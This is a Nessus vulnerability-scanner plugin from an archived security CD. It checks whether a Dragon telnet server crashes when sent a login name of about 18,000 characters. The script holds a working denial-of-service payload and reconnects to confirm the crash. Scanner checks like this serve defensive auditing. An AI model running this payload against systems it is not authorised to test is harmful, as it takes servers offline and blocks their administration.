home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / dragon_telnet.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  93 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10451);
  10.  script_bugtraq_id(1352);
  11.  script_version ("$Revision: 1.13 $");
  12.  script_cve_id("CAN-2000-0480");
  13.  name["english"] = "Dragon telnet overflow";
  14.  name["francais"] = "Dragon telnet overflow";
  15.  
  16.  
  17.  script_name(english:name["english"], francais:name["francais"]);
  18.  
  19.  desc["english"] = "It was possible to
  20. shut down the remote telnet server by issuing
  21. a far too long login name (over 16,000 chars)
  22.  
  23. This problem allows an attacker to prevent
  24. remote administration of this host.
  25.  
  26. Solution : upgrade to the latest version your telnet server.
  27.  
  28. Risk factor : High";
  29.  
  30.  
  31.  desc["francais"] = "Il s'est avΘrΘ possible
  32. de couper le serveur telnet distant en 
  33. donnant un nom de login beaucoup trop
  34. long.
  35.  
  36. Ce problΦme permet α des pirates en herbe
  37. d'empecher ce serveur d'etre administrΘ
  38. α distance.
  39.  
  40. Solution : mettez α jour votre serveur telnet.
  41.  
  42. Facteur de risque : ElevΘ";
  43.  
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Attempts a USER buffer overflows";
  48.  summary["francais"] = "Essaye un USER buffers overflows";
  49.  script_summary(english:summary["english"], francais:summary["francais"]);
  50.  
  51.  script_category(ACT_DENIAL);
  52.  
  53.  
  54.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  55.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  56.  family["english"] = "Denial of Service";
  57.  family["francais"] = "DΘni de service";
  58.  script_family(english:family["english"], francais:family["francais"]);
  59.  script_dependencie("find_service.nes");
  60.  script_require_ports("Services/telnet", 23);
  61.  exit(0);
  62. }
  63. port = get_kb_item("Services/telnet");
  64. if(!port)port = 23;
  65.  
  66. if(!get_port_state(port))exit(0);
  67.  
  68. soc = open_sock_tcp(port);
  69. if(soc)
  70. {
  71.   r = telnet_init(soc);
  72.   r2 = recv(socket:soc, length:4096);
  73.   r = r + r2;
  74.   if(r)
  75.   {
  76.   req = string(crap(18000), "\r\n");
  77.   send(socket:soc, data:req);
  78.   close(soc);
  79.   sleep(1);
  80.  
  81.   soc2 = open_sock_tcp(port);
  82.   if(!soc2)security_hole(port);
  83.   else {
  84.       r = telnet_init(soc2);
  85.     r2 = recv(socket:soc2, length:4096);
  86.     r = r + r2;
  87.       close(soc2);
  88.     if(!r)security_hole(port);
  89.       }
  90.   }  
  91. }
  92.  
  93.